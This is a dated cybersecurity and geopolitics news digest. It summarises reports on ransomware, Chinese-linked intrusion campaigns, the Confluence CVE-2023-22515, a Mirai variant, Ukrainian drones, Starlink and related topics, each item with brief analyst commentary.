Daily Drop (622): Russia's Hidden Hand, Grassroots Drones, RISC-V CPU cores, CVE-2023-22515, MicroSoft: IRS, Mirai Variant, Finland: Sabotage, Storm-1567, Starlink Evolution, 中国的国家安全部遭到黑客攻击, ToddyCat
10-12-23
Thursday, Oct 12, 2023 // (IG): BB // 中国的国家安全部遭到黑客攻击
Russia's Hidden Hand in the Hamas Attack on Israel
Bottom Line Up Front (BLUF): The recent attack on Israel by the terrorist group Hamas may have been influenced by Russia, with President Vladimir Putin benefiting from the ensuing chaos. The attack serves as a distraction from Russia's faltering military operations in Ukraine and its broader geopolitical ambitions.
Analyst Comments: The circumstantial evidence pointing towards Russia's involvement in the Hamas attack on Israel is compelling. Putin's strategy appears to be to divert attention from his failures in Ukraine and to create divisions within the U.S. and its allies. The Biden administration is now in a precarious position, having to manage multiple crises simultaneously. A decisive strategy focusing on Russia is essential. This involves not only supporting Israel's defense but also providing Ukraine with the necessary military aid to counter Russia's advances. The recent events underscore the need for a cohesive and robust foreign policy approach to address the multifaceted challenges posed by Russia.
FROM THE MEDIA: The sudden outbreak of war in Israel, instigated by Hamas, seems to have only one real beneficiary: Russian President Vladimir Putin. By supporting Iran, a known ally of Hamas, Putin has effectively opened a new front in his ongoing war against the West. This move aligns with Mitt Romney's 2012 assertion that Russia is a significant geopolitical foe. The current state of Russia, under Putin's leadership, is aggressively trying to re-establish its global dominance. Over the past 11 years, Russia has been involved in various destabilizing activities, from sowing disinformation to direct interventions in countries like Syria, Niger, and Sudan. The recent surprise attack on Israel by Hamas, termed Operation Al-Aqsa, was unprecedented in its scale and sophistication, leading to speculations of support from Iran and possibly Russia. Reports from The Washington Post and Wall Street Journal have confirmed Iran's involvement.
READ THE STORY: The Hill
Advanced Defense Mechanism Prevents Large-Scale Encryption Attempt by Storm-1567
Bottom Line Up Front (BLUF): Microsoft Defender for Endpoint successfully stopped a significant remote encryption attempt by Akira ransomware targeting an undisclosed industrial organization in June 2023. The campaign, attributed to the operator Storm-1567, utilized devices not onboarded to Microsoft Defender as a defense evasion strategy.
Analyst Comments: The Akira ransomware attack underscores the importance of advanced defense mechanisms in today's cybersecurity landscape. Microsoft Defender for Endpoint's ability to automatically disrupt attack chains showcases the evolution of endpoint protection tools. Organizations must continually update and refine their security measures to counteract the ever-evolving tactics and techniques of threat actors. The proactive containment of compromised accounts, especially those with high privileges, is crucial in preventing the escalation and spread of attacks within networks.
FROM THE MEDIA: In early June 2023, Akira ransomware actors initiated a large-scale attack on an unknown industrial entity. The attackers employed devices not integrated with Microsoft Defender for Endpoint, aiming to evade detection. Before attempting to encrypt devices using a compromised user account, the attackers conducted reconnaissance and lateral movement activities. Microsoft's new automatic attack disruption feature played a crucial role in thwarting the attack. This feature restricts breached accounts from accessing network endpoints and resources, effectively limiting the attackers' lateral movement capabilities, irrespective of the account's Active Directory status or privilege level.
READ THE STORY: THN
Ukraine's Grassroots Drone Revolution
Bottom Line Up Front (BLUF): Ukraine's rapid development of a domestic drone industry, in response to the Russian invasion and the subsequent Chinese drone export ban, highlights the nation's resilience and adaptability. These pop-up drone factories, producing combat drones, have become a cornerstone of Ukraine's asymmetric warfare strategy against Russia.
Analyst Comments: The emergence of Ukraine's grassroots drone industry is a testament to the nation's innovative spirit and determination to defend its sovereignty. The government's proactive support, combined with the entrepreneurial drive, has enabled Ukraine to counterbalance Russia's military might with cost-effective, innovative solutions. The rapid adaptation and growth of this industry not only provide Ukraine with a tactical advantage but also lay the foundation for a robust tech industry post-conflict. The continuous innovation in drone designs, like the "drone in a box" concept by Airlogix, indicates that Ukraine is not just looking to match its adversaries but is striving to stay a step ahead.
FROM THE MEDIA: Vitalii Kolesnichenko's Airlogix, a Ukrainian drone company, epitomizes the swift transformation of the nation's tech industry amidst the conflict. Initially focused on cargo drones, the company pivoted to combat drones post-invasion. The Chinese drone export ban in September further accelerated domestic drone production, with entrepreneurs stepping in to fill the void. The Ukrainian government, recognizing the potential of drones in the ongoing conflict, has provided significant support. Alex Bornyakov, Ukraine’s deputy minister of digital transformation, has been instrumental in systematizing the grassroots effort, easing regulations, and increasing profit ceilings for military contracts. This has spurred the growth of hundreds of drone companies across the country. Airlogix and other companies are continuously innovating, with designs for drones that can be quickly assembled on the front lines, enhancing Ukraine's combat capabilities.
READ THE STORY: The Record
SpaceX's Starlink Evolution: Direct-to-Cell and IoT Services on the Horizon
Bottom Line Up Front (BLUF): SpaceX's Starlink is gearing up to introduce a direct-to-cell service for text messaging in 2024, with plans to roll out voice, data, and IoT services by 2025. This move signifies Starlink's ambition to bridge connectivity gaps, especially in rural and remote areas, by partnering with global cellular providers.
Analyst Comments: SpaceX's Starlink is making strategic moves to position itself as a major player in the global connectivity landscape. By introducing direct-to-cell and IoT services, Starlink is not only expanding its service offerings but also addressing the connectivity challenges faced by remote and underserved regions. Collaborations with global cellular providers further underscore Starlink's commitment to creating a more interconnected world. As these services roll out, they have the potential to reshape the dynamics of satellite-based communication and connectivity.
FROM THE MEDIA: SpaceX has updated Starlink's website to highlight its upcoming direct-to-cell service. Elon Musk, SpaceX's Chief Engineer, had earlier indicated that Starlink would begin its beta service for direct-to-cell in collaboration with T-Mobile by the end of 2023. This partnership, announced last year, aims to enhance cellular network coverage in areas with limited connectivity, allowing T-Mobile users to send messages via Starlink satellites. In addition to T-Mobile, Starlink has forged partnerships with several global cellular providers, including Rogers (Canada), Optus (Australia), One NZ (New Zealand), KDDI (Japan), and Salt (Switzerland). Starlink is actively inviting other cellular providers to collaborate and leverage its service to expand their network reach. The satellites will utilize the partner spectrum to operate services within their respective countries.
READ THE STORY: Via Satellite
Asian Governments and Telecoms Under Cyber Siege
Bottom Line Up Front (BLUF): Prominent government and telecom sectors in Asia have been under cyberattack since 2021. The campaign, named "Stayin' Alive" by cybersecurity firm Check Point, employs rudimentary backdoors and loaders to introduce subsequent-stage malware. The campaign's infrastructure has similarities with ToddyCat, a China-linked threat actor.
Analyst Comments: The ongoing cyberattacks on Asian government and telecom entities highlight the evolving nature of cyber threats. The use of basic tools, which are frequently replaced and possibly built from scratch, indicates a shift in tactics by threat actors to evade detection. The potential link between the Stayin' Alive campaign and the China-linked ToddyCat group underscores the geopolitical implications of such cyber campaigns. Organizations need to be vigilant and adopt robust cybersecurity measures to defend against such sophisticated and evolving threats.
FROM THE MEDIA: The Stayin' Alive campaign has been targeting organizations in Vietnam, Uzbekistan, Pakistan, and Kazakhstan. The tools used in these attacks are simple and varied, suggesting their primary purpose is to download and run additional payloads. Interestingly, the infrastructure used in this campaign overlaps with that of ToddyCat, a known cyber adversary that has been targeting government and military agencies in Europe and Asia since December 2020. The attack chain typically begins with a spear-phishing email containing a ZIP file. This file has a legitimate executable that uses DLL side-loading to introduce a backdoor named CurKeep. This backdoor can send information about the compromised system to a remote server, execute commands from the server, and write server responses to a file on the system.
READ THE STORY: THN
Suspected Sabotage on Maritime Infrastructure Intensifies Concerns
Bottom Line Up Front (BLUF): The Finnish Security and Intelligence Service (Supo) has issued a warning about deteriorating relations with Russia, following a suspected sabotage act on Finland's maritime infrastructure. While no direct blame has been placed, there are suspicions of external involvement, with Russia being a potential culprit.
Analyst Comments: The maritime sabotage incident and Supo's subsequent warnings highlight the growing geopolitical tensions between Finland and Russia. Finland's recent decision to join NATO, following Russia's actions in Ukraine, marks a significant shift in regional dynamics. As cyber capabilities become increasingly central to nation-state strategies, countries must enhance their defenses against potential cyber threats. The incident serves as a reminder of the evolving nature of international conflicts, where physical and cyber realms are deeply intertwined.
FROM THE MEDIA: Supo's recent statements underscore the escalating tensions between Finland and Russia, especially in the wake of the sabotage incident that affected a subsea telecommunications cable and a gas pipeline connecting Finland and Estonia. Although no direct accusations have been made, Finland's President Sauli Niinistö's office has hinted at "external activity" being the cause. Local media, such as the tabloid Iltalehti, have cited sources pointing to Russia as the potential instigator. However, Prime Minister Petteri Orpo has called for a comprehensive investigation before drawing any conclusions. Supo's director, Antti Pelttari, emphasized that Russia's ongoing involvement in the Ukraine conflict and its attempts to reduce international isolation do not diminish the potential threats to Finland. The agency also highlighted the vulnerabilities in Finland's marine infrastructure. Suvi Alvari, a Supo researcher, indicated that Russia's current operations against Finland are primarily deterrence-focused, with the energy sector being a significant target.
READ THE STORY: The Record
The Silicon Valley-based firm unveils cores designed for high-performance tasks and AI/ML applications
Bottom Line Up Front (BLUF): SiFive has introduced two new RISC-V CPU cores, the Performance P870 and the X380, targeting high-performance and AI/ML applications. These cores represent a significant advancement in performance and AI workload acceleration, showcasing the potential of RISC-V in the evolving tech landscape.
Analyst Comments: SiFive's latest core designs highlight the company's commitment to pushing the boundaries of RISC-V technology. The significant performance improvements and focus on AI/ML applications indicate a strategic move to cater to the growing demands of the tech industry. The introduction of these cores also comes at a time when there are calls for export controls on semiconductors to China, which could have implications for the RISC-V ecosystem. SiFive's advancements in RISC-V technology, combined with the geopolitical landscape, make it a company to watch in the coming years.
FROM THE MEDIA: SiFive, a Silicon Valley-based company, has launched the Performance P870, a 64-bit out-of-order superscalar processor core that supports the open RISC-V instruction set. This core can run Linux, Android, and other compatible operating systems and boasts features like an IOMMU, hardware support for hypervisors, and SiFive's WorldGuard for code and data isolation. The P870 is designed for applications requiring high throughput and low power consumption, making it suitable for mobile, edge, data center, and automotive markets. Compared to its predecessor, the P670, the P870 offers a 50% performance boost. The core's design allows for SoC configurations of up to 32 cores using eight four-core clusters. The second core, the X380, is the successor to SiFive's X280 core and is specifically designed to accelerate large-vector instructions used in AI and machine learning.
READ THE STORY: The Register
A recently discovered Atlassian vulnerability is being exploited by hackers linked to the Chinese government
Bottom Line Up Front (BLUF): Microsoft has reported that hackers associated with the Chinese government are exploiting a new vulnerability in Atlassian's product. This vulnerability, identified as CVE-2023-22515, affects Atlassian’s Confluence Data Center and Server product and has been under attack since September 14.
Analyst Comments: The exploitation of the Atlassian vulnerability by hackers linked to the Chinese government underscores the persistent cybersecurity threats posed by nation-state actors. The rapid exploitation of newly discovered vulnerabilities highlights the need for organizations to stay updated on potential threats and to implement patches promptly. The association of these attacks with known entities affiliated with the Chinese government further emphasizes the geopolitical implications of cybersecurity in the current digital age.
FROM THE MEDIA: On Tuesday evening, Microsoft released a notice indicating that a nation-state actor has been exploiting the vulnerability in Atlassian's Confluence Data Center and Server product. Atlassian had previously issued an advisory and patch for this vulnerability on October 4 and updated it to confirm that a known nation-state actor was actively exploiting it. This bug has been categorized by Atlassian as "critical," their highest severity rating. Microsoft emphasized the gravity of the situation, stating that any device connected to a network with a vulnerable application can exploit this vulnerability to create a Confluence administrator account. They strongly advised Atlassian customers to update to the latest fixed version immediately and to isolate vulnerable Confluence applications from public internet access until they can be upgraded.
READ THE STORY: The Record
Microsoft Challenges IRS's $28.9 Billion Back Tax Bill
Bottom Line Up Front (BLUF): Microsoft has disclosed that the IRS sent them a bill for $28.9 billion in back taxes last month. The company has expressed its intention to challenge this charge.
Analyst Comments: The IRS's substantial back tax bill to Microsoft underscores the complexities and potential pitfalls of international tax practices, particularly transfer pricing. As global tech giants continue to navigate the intricate web of international tax regulations, such disputes between companies and tax authorities are likely to persist. The outcome of Microsoft's contestation could set a precedent for other tech companies facing similar challenges.
FROM THE MEDIA: In a recent SEC filing, Microsoft announced that the IRS issued them a notice of proposed adjustments (NOPAs) for the tax years 2004-2013 on September 26. The primary issues highlighted in the NOPAs pertain to "intercompany transfer pricing." Transfer pricing involves setting prices for goods and services exchanged within an organization. The IRS defines it as prices charged between affiliates in an intercompany transaction involving the transfer of goods, services, or intangibles. This practice is legal, but when it results in revenue being shifted to low-tax jurisdictions, it can be deemed abusive. In 2020, ProPublica reported on Microsoft's transfer of assets to a small corporation in Puerto Rico, which offered the company an extremely low tax rate, described as "nearly zero percent." This move allegedly allowed Microsoft to avoid taxing around $39 billion in profits at the rates that other jurisdictions impose.
READ THE STORY: The Register
Evolving Cyber Threats: ShellBot's New Evasion Tactics and the Rise of Malicious Certificates
Bottom Line Up Front (BLUF): ShellBot, a known threat, has adopted a new evasion technique by using IP addresses in hexadecimal notation to infiltrate Linux SSH servers. Concurrently, attackers are leveraging abnormal certificates with extended strings to distribute information-stealing malware, highlighting the evolving tactics cybercriminals employ to bypass detection.
Analyst Comments: The adoption of hexadecimal IP addresses by ShellBot and the use of abnormal certificates indicate the lengths to which cybercriminals are willing to go to evade detection. As cyber threats continue to evolve, it's crucial for cybersecurity professionals to stay updated on these tactics and adapt their defense mechanisms accordingly. The continuous evolution of these threats underscores the importance of robust cybersecurity measures, regular system updates, and user education.
FROM THE MEDIA: ShellBot, traditionally known for breaching servers with weak SSH credentials, has now been observed using hexadecimal IP addresses to download its malware, a move seen as an attempt to evade URL-based detection mechanisms. This malware, developed in Perl, communicates with its command-and-control (C2) server via the IRC protocol. The AhnLab Security Emergency Response Center (ASEC) highlighted this change in tactics, noting that the malware can be successfully downloaded and executed on Linux systems due to the curl tool's ability to support hexadecimal notation.
READ THE STORY: THN
UK's Satellite Vu Achieves Milestone with High-Resolution Thermal Imagery from HOTSAT-1
Bottom Line Up Front (BLUF): Satellite Vu, a London-based thermal infrared satellite firm, has successfully received high-resolution thermal imagery from its recently launched satellite, HOTSAT-1. This achievement marks a significant step in the company's transition to commercial operations, with HOTSAT-1 being the pioneer of a planned eight-satellite constellation.
Analyst Comments: Satellite Vu's HOTSAT-1 represents a significant leap in the realm of satellite thermal imaging. The satellite's capabilities, combined with Satellite Vu's vision and partnerships, position the company at the forefront of thermal infrared satellite operations. As the company progresses with its plans for a satellite constellation, it is poised to play a transformative role in diverse sectors, from environmental monitoring to logistics optimization. The advancements made by Satellite Vu underscore the growing significance of space technology in addressing global challenges and shaping a sustainable future.
FROM THE MEDIA: Satellite Vu's HOTSAT-1, designed and manufactured in the UK in collaboration with Surrey Satellite Technologies, boasts a 3.5m resolution mid-wave infrared imager with video capability, ensuring a sensitivity of less than 2 degrees Celsius. The satellite is the first in a series of eight that the company plans to launch. The company, which aspires to be recognized as 'The World’s Thermometer', has highlighted the significance of this "first light imagery" as a pivotal moment in its journey towards commercial operations. Anthony Baker, CEO and Co-founder of Satellite Vu, emphasized the company's dedication to harnessing advanced technology for the planet's betterment. He highlighted HOTSAT-1's capability to capture invaluable thermal imagery, which can be applied in diverse areas ranging from logistics optimization, environmental planning, to energy-related decision-making.
READ THE STORY: Electronics Weekly
Mirai Botnet Variant Targets Routers and IoT Devices
Bottom Line Up Front (BLUF): A Mirai-based malware botnet variant, IZ1H9, has been observed aggressively targeting routers and other internet-connected devices, potentially amassing a vast botnet capable of launching potent DDoS attacks.
Analyst Comments: The aggressive targeting of routers and IoT devices by the IZ1H9 variant of the Mirai botnet underscores the evolving threat landscape of cyberattacks. As botnets continue to adapt and exploit new vulnerabilities, there is a heightened need for robust cybersecurity measures and timely patching of known vulnerabilities to prevent large-scale DDoS attacks and protect critical online infrastructure.
FROM THE MEDIA: Researchers at Fortinet have discovered that the IZ1H9 variant of the Mirai-based malware botnet has expanded its payload arsenal to target routers and other internet-facing devices. This variant was found exploiting vulnerabilities in products from nine brands, including D-Link, Netis, Sunhillo, Geutebruck, Yealink, Zyxel, TP-Link, Korenix, and TOTOLINK. The peak exploitation of these vulnerabilities was believed to have occurred on September 6. IZ1H9 was first identified in August 2018, two years after the original Mirai botnet was seen infecting Linux-based devices. The original Mirai has been linked to some of the most disruptive distributed denial-of-service (DDoS) attacks, including a notable 2016 attack that affected major websites like Twitter, Reddit, and Netflix.
READ THE STORY: The Record
Stealth Malware Disguised as WordPress Plugin Uncovered
Bottom Line Up Front (BLUF): Cybersecurity experts have identified a sophisticated malware strain masquerading as a WordPress caching plugin. This malware covertly establishes administrator accounts, granting attackers remote control over compromised websites.
Analyst Comments: The discovery of this malware highlights the escalating threats targeting popular platforms like WordPress. The malware's ability to remotely control and monetize a victim site poses significant risks to website administrators, potentially harming SEO rankings, user privacy, and overall site integrity. It's crucial for website owners and administrators to exercise caution, ensuring they only install trusted plugins and regularly update and patch their systems. The increasing sophistication of such threats underscores the need for continuous vigilance and proactive cybersecurity measures.
FROM THE MEDIA: Researchers have unveiled a malware strain that poses as a professional-looking WordPress plugin, suggesting it's a caching tool. However, it's packed with malicious functions, including the ability to remotely control plugins, create rogue admin accounts, and manipulate content. The malware can also redirect search engine crawlers to index suspicious content, leading site visitors to questionable destinations. In September 2023, over 17,000 WordPress sites were compromised with a similar malware, emphasizing the growing threat to WordPress platforms.
READ THE STORY: THN
Items of interest
Wagner Group's Activities Highlight the Complex Landscape of PMCs
Bottom Line Up Front (BLUF): Private Military Companies (PMCs), while often associated with negative impacts on global stability and human rights, are not universally detrimental. When structured with accountability and aligned with international law, PMCs can offer states significant benefits. However, the Wagner group's recent activities underscore the potential risks of PMCs closely aligned with authoritarian governments.
Analyst Comments: The global landscape of PMCs is diverse, with companies ranging from those closely tied to authoritarian regimes to those operating independently and emphasizing accountability. Governments seeking the services of PMCs must exercise due diligence, ensuring that they engage with firms that prioritize transparency, accountability, and adherence to international law. The Wagner group's activities serve as a cautionary tale, highlighting the potential risks of PMCs that operate as extensions of authoritarian states. However, with proper oversight and stringent hiring processes, PMCs can be valuable assets to states, enhancing their capabilities without compromising global stability or human rights.
FROM THE MEDIA: The Wagner group's increasing involvement in Africa and a failed mutiny attempt in Russia have reignited concerns about PMCs. Historically, the industry has been criticized for its potential to destabilize regions and violate human rights. However, PMCs, also known as private military and security companies (PMSCs), offer a broad spectrum of services, from logistical support to cyber defense. While Wagner's close ties with the Russian state are concerning, it's an anomaly in the industry. Most PMCs, especially those from democracies, operate as independent entities. These firms, when transparent and accountable, can align with international humanitarian laws and offer states valuable services without compromising human rights or global stability.
READ THE STORY: AIIA
Asymmetric Warfare: Taiwan's New Underwater Drone (Video)
FROM THE MEDIA: Taiwan has unveiled its new underwater drone designed for asymmetric warfare against China. The Seawolf 400 submersible can be used for reconnaissance, search and rescue, and kamikaze attacks against enemy ships.
Unmanned Underwater Vehicles - The Future of Submarines (Video)
FROM THE MEDIA: Unmanned Underwater Vehicles (UUVs) are rapidly emerging as game-changers in naval warfare, offering enhanced capabilities, stealth, and flexibility. As technology continues to advance, UUVs are poised to play a pivotal role in future submarine operations and strategies.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.